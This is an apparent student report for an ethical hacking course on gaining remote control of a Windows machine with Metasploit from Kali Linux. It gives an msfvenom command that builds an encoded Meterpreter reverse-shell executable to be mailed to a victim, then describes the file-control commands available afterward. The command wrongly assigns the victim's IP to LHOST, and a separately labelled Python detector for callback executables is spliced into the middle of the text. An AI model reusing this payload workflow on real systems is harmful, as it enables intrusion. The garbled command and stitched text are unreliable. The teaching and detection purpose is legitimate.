CSI3508 - Ethical Hacking: Windows Exploit with Kali Linux Metasploit


Added on  2023/06/04

Report
AI Summary
This report outlines the development of an exploit targeting Windows operating systems using the Metasploit framework within a Kali Linux environment. The goal is to gain unauthorized access to a victim's Windows machine without physical access. Metasploit, a penetration testing tool, is used to create and execute exploit code against the target. The process involves setting up the Kali Linux environment with the necessary tools, identifying the target Windows machine's IP address and port, creating an executable file using Msfconsole, and sending this file to the victim. Once the victim opens the file, the attacker gains control through the meterpreter option, enabling activities such as file manipulation, directory changes, and even remote shutdown. The report details the commands used, the process of setting up the exploit, and the potential impact on the victim's system.
Running Head: ICT ETHICAL HACKING 1
KALI LINUX EXPLOIT USING METASPLOIT
Student name
Institution Affiliation
Facilitator
Course
Date
The exploit developed specifically targeted Windows operating systems using Metasploit. Through this approach, I would be in a position to get into the victim's computer running on the Windows platform without physically logging into the system. In its simple definition, Metasploit is a project that aids in penetration testing and IDS signature development. Using the tool, exploit code can be developed and executed against remote machines (Dieterle, 2016).
Some of my requirements in this development included the Metasploit Framework and a Ruby installation containing all the Ruby packages, which I installed on a Kali Linux OS machine, and two OSs (Kali Linux and Windows) installed on two different machines, although on the same NAT network. I also ensured that the target machine did not have any antivirus running on it (Holik, Horalek, Marik, Neradova & Zitta, 2014, p.240). The most important Metasploit Framework command I used throughout this exploit was Msfconsole because of its flexibility, its features and its support for the tools within the framework. The command provided me with a handy all-in-one interface to almost all the settings under the framework.
To be able to hack into the victim's Windows machine, I would need the machine's IP address and one of its port numbers, which I would easily obtain since we are on the same network as the machine. Basically, within the same network each machine's IP address can be viewed from any other machine on that network if the network administrator has not configured the machines otherwise (Muniz, 2013).
An executable file is therefore created with the IP and port specifications on the Kali Linux platform through the Msfconsole command “msfvenom –p windows/meterpreter/reverse_tcp LHOST= (IP address of windows machine) LPORT=(PORT in the windows machine) –f exe –e x86/shikata_ga_nai –i 10> /root/desktop/ (desktop name).exe”.
Through this command, a file is created on the Kali Linux machine which cannot be executed on the same platform, considering the format which we have used. It appears like a folder on this platform and must be sent to the victim through any available channel, including mail (Pritchett & De Smet, 2013).
Once the file is sent, the attacker can set the Metasploit platform into a listening state using the command “exploit” while the Msfconsole command is in handler status. When set to a listening state, it waits until the file sent to the Windows victim machine is opened. Whenever the victim opens the file which has been sent to his Windows machine, on the side of the attacker the “meterpreter” option opens automatically.
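From the defender's side, the sequence described above (a received executable is opened and at once connects back to a listener) leaves a process-creation event followed by an outbound connection from the same process. The following is an added example, not part of the original report, that correlates the two; the events are constructed samples using Sysmon event ID 1 and 3 field names, and the path list, the 60-second window and the function names are assumptions.

```python
import re
from datetime import datetime, timedelta

# Paths where a mailed or downloaded executable usually lands (assumed list).
USER_WRITABLE = re.compile(
    r"\\users\\[^\\]+\\(downloads|desktop|appdata\\local\\temp)\\", re.I)
WINDOW = timedelta(seconds=60)  # assumed correlation window; tune per environment

def _ts(event):
    return datetime.strptime(event["UtcTime"], "%Y-%m-%d %H:%M:%S.%f")

def find_suspect_callbacks(events):
    """Flag processes started from a user-writable path that open an
    outbound connection within WINDOW of starting."""
    started, findings = {}, []   # started: ProcessGuid -> (time, image, parent)
    for ev in sorted(events, key=_ts):
        guid = ev["ProcessGuid"]
        if ev["EventID"] == 1 and USER_WRITABLE.search(ev["Image"]):
            started[guid] = (_ts(ev), ev["Image"], ev["ParentImage"])
        elif ev["EventID"] == 3 and ev["Initiated"] == "true" and guid in started:
            t0, image, parent = started.pop(guid)  # judge the first connection only
            if _ts(ev) - t0 <= WINDOW:
                findings.append(
                    (image, parent, ev["DestinationIp"], ev["DestinationPort"]))
    return findings

# Constructed events; field names follow Sysmon event IDs 1 and 3.
SAMPLE_EVENTS = [
    {"EventID": 1, "UtcTime": "2023-06-04 10:15:02.120", "ProcessGuid": "{A1}",
     "Image": r"C:\Users\alice\Downloads\invoice.exe",
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"EventID": 3, "UtcTime": "2023-06-04 10:15:03.480", "ProcessGuid": "{A1}",
     "Image": r"C:\Users\alice\Downloads\invoice.exe", "Initiated": "true",
     "DestinationIp": "192.0.2.10", "DestinationPort": "8443"},
    {"EventID": 1, "UtcTime": "2023-06-04 10:16:00.000", "ProcessGuid": "{B2}",
     "Image": r"C:\Program Files\Browser\browser.exe",
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"EventID": 3, "UtcTime": "2023-06-04 10:16:01.000", "ProcessGuid": "{B2}",
     "Image": r"C:\Program Files\Browser\browser.exe", "Initiated": "true",
     "DestinationIp": "198.51.100.7", "DestinationPort": "443"},
    {"EventID": 1, "UtcTime": "2023-06-04 10:20:00.000", "ProcessGuid": "{C3}",
     "Image": r"C:\Users\bob\Desktop\setup.exe",
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"EventID": 3, "UtcTime": "2023-06-04 10:31:00.000", "ProcessGuid": "{C3}",
     "Image": r"C:\Users\bob\Desktop\setup.exe", "Initiated": "true",
     "DestinationIp": "198.51.100.9", "DestinationPort": "443"},
]

print(find_suspect_callbacks(SAMPLE_EVENTS))
```

Only the first sample process is reported: the second runs from an installed-program path, and the third connects outside the window.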
At this point, there is a lot that can be done on the victim's machine by the attacker, as observed when the command “help” is executed. Some of the activities the attacker can do on the victim's machine include reading the contents of files on the screen, changing directories, editing files, deleting files, searching for files, uploading files, changing local directories, printing local directories, removing directories, moving source to destination, and printing working directories (Weidman, 2014). These activities can be achieved through different commands, which are listed by the help command.
Considering these activities gives a clear picture that the attacker will have achieved full control of the victim's machine without any knowledge of his or her password, to the extent of shutting it down remotely.
References
Dieterle, D. W. (2016). Basic Security Testing with Kali Linux. CreateSpace Independent
Publishing Platform.
Holik, F., Horalek, J., Marik, O., Neradova, S., & Zitta, S. (2014, November). Effective
penetration testing with Metasploit framework and methodologies. In Computational
Intelligence and Informatics (CINTI), 2014 IEEE 15th International Symposium on (pp.
237-242). IEEE.
Muniz, J. (2013). Web Penetration Testing with Kali Linux. Packt Publishing Ltd.
Pritchett, W. L., & De Smet, D. (2013). Kali Linux Cookbook. Packt Publishing Ltd.
Weidman, G. (2014). Penetration testing: a hands-on introduction to hacking. No Starch Press.